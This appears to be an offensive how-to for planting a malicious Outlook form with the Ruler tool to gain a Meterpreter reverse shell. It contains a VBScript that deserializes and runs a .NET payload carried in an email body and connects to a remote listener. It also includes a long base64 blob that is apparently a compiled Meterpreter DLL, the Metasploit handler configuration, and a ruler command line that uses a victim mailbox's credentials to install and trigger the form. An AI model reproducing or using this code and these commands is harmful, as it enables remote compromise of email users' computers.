Using VBSMeter with Ruler

Command.vbs

Call X()
End Function

Dim RHOST: RHOST = "x.x.x.x"
Dim RPORT: RPORT = "8999"

Function Base64ToStream(b)
  Dim enc, length, ba, transform, ms
  Set enc = CreateObject("System.Text.ASCIIEncoding")
  length = enc.GetByteCount_2(b)
  Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")
  Set ms = CreateObject("System.IO.MemoryStream")
  ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
  ms.Position = 0
  Set Base64ToStream = ms
End Function

Sub Pew
Dim s, entry_class
s = Trim(Item.Body)

entry_class = "MeterPreter"

Dim fmt, al, d, o
Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
Set al = CreateObject("System.Collections.ArrayList")
al.Add fmt.SurrogateSelector

Set d = fmt.Deserialize_2(Base64ToStream(s))
Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
o.MSFConnect RHOST, RPORT
End Sub

Function X()
Pew

Payload.b64

AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkDAAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAHdGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAACQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0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BagAKQG2Aq4AKQGoBrQAkQCMBAYAJwB7AHECLgALAMoBLgATANMBLgAbAPIBLgAjAPsBLgArABYCLgAzABYCLgA7ABYCLgBDAPsBLgBLABwCLgBTABYCLgBbABYCLgBjADQCLgBrAF4CQwBbAGsCCgBmAQwAagEIAAYAxgAgAE8DRANaAwEAjQBiEQMAOQQBAAABBQAoBAIARAEHAEYGAQBAAQkAGwYBAAABCwCHBgEARAENAFAGAQAAAQ8ArQYDAAABEQBGAAQAAAETAF4ABAAAARUABwYEAASAAAABAAAAAAAAAAAAAAAAABMAAAACAAAAAAAAAAAAAAC9AD0AAAAAAAIAAAAAAAAAAAAAAL0AgQMAAAAAAwACAAAAAAAAa2VybmVsMzIAPE1vZHVsZT4AQ1NoYXJwLU1ldGVycHJldGVyRExMAGdRT1MAc1FPUwBscFdTQURhdGEAbXNjb3JsaWIAVmlydHVhbEFsbG9jAGxwVGhyZWFkSWQAQ3JlYXRlVGhyZWFkAHdWZXJzaW9uUmVxdWVzdGVkAEluaXRpYWxpemVkAEdldEZpZWxkAERlbWFuZABSdW50aW1lVHlwZUhhbmRsZQBoSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAHNvY2tldEhhbmRsZQBWYWx1ZVR5cGUAUHJvdG9jb2xUeXBlAHByb3RvY29sVHlwZQBmbEFsbG9jYXRpb25UeXBlAFNvY2tldFR5cGUAc29ja2V0VHlwZQBUcmFuc3BvcnRUeXBlAFRyeVBhcnNlAEd1aWRBdHRyaWJ1dGUAVW52ZXJpZmlhYmxlQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFNlY3VyaXR5UGVybWlzc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAUmVhZEJ5dGUAR2V0VmFsdWUAZ2V0X1NpemUAZHdTdGFja1NpemUAc29ja2V0QWRkcmVzc1NpemUAZHdTaXplAFNlcmlhbGl6ZQBpTWF4VWRwRGcAVG9TdHJpbmcAaXBTdHJpbmcAbGVuZ3RoAEFsbG9jSEdsb2JhbABGcmVlSEdsb2JhbABNYXJzaGFsAFdzMl8zMi5kbGwAd3MyXzMyLmRsbABrZXJuZWwzMi5kbGwAQ1NoYXJwLU1ldGVycHJldGVyRExMLmRsbABTeXN0ZW0Ad0hpZ2hWZXJzaW9uAENvZGVBY2Nlc3NQZXJtaXNzaW9uAFNvY2tldFBlcm1pc3Npb24ARGVzdGluYXRpb24AU2VjdXJpdHlBY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24Ac3pEZXNjcmlwdGlvbgB3VmVzdGlvbgBGaWVsZEluZm8AcHJvdG9jb2xJbmZvAGxwVmVuZG9ySW5mbwBaZXJvAFdTQUNsZWFudXAAZ3JvdXAAV1NBU3RhcnR1cABtX0J1ZmZlcgBpbkJ1ZmZlcgBvdXRCdWZmZXIAYnVmZmVyAGxwUGFyYW1ldGVyAE1ldGVyUHJldGVyAEJpdENvbnZlcnRlcgAuY3RvcgBSZWFkSW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBkd01pbGxpc2Vjb25kcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBscFRocmVhZEF0dHJpYnV0ZXMAR2V0Qnl0ZXMAQmluZGluZ0ZsYWdzAGR3Q3JlYXRpb25GbGFncwBTb2NrZXRGbGFncwBzb2NrZXRGbGFncwBmbGFncwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMATmV0d29ya0FjY2VzcwBJUEFkZHJlc3MAZ2V0X0FkZHJlc3MAbHBBZGRyZXNzAFNvY2tldEFkZHJlc3MAc29ja2V0QWRkcmVzcwBscFN0YXJ0QWRkcmVzcwBTeXN0ZW0uTmV0LlNvY2tl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

Steps.md

This requires Ruler

The original payload, VBSMeter was created by @Cn33liz and can be found here: VBSMeter. The version here is slightly slimmed down and modified so that it fits into the maximum payload size for Ruler forms.

The "payload" has been split into a seperate file, this allows us to send it as the message body of an email, and have the form invoke it dynamically.

Setup MSF

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST 0.0.0.0
set LPORT 443
set AutoRunScript post/windows/manage/migrate NAME=notepad.exe
set EnableUnicodeEncoding true
set EnableStageEncoding true
set ExitOnSession false
set EXITFUNC thread
exploit -j

Remember to set EXITFUNC, if you leave it as process Outlook will crash/exit.

Shell through Ruler

1. Create Command.vbs and Payload.b64.
2. cat /tmp/Payload.b64|xargs -0 -I{} ./ruler-linux64 --email [email protected] --password "ThePassword" form add --suffix metpew --input /tmp/Command.vbs --send --body "{}" --rule
3. You should receive a shell

You'll note that command.vbs has a bit of a weird syntax.

Call X()
End Function

^ this closes the Function P(), which exists in the defualt forms template.

Function X()
Pew

^ this calls our sub to spawn the shell. There is NO End Function needed as the default forms template inserts this automatically.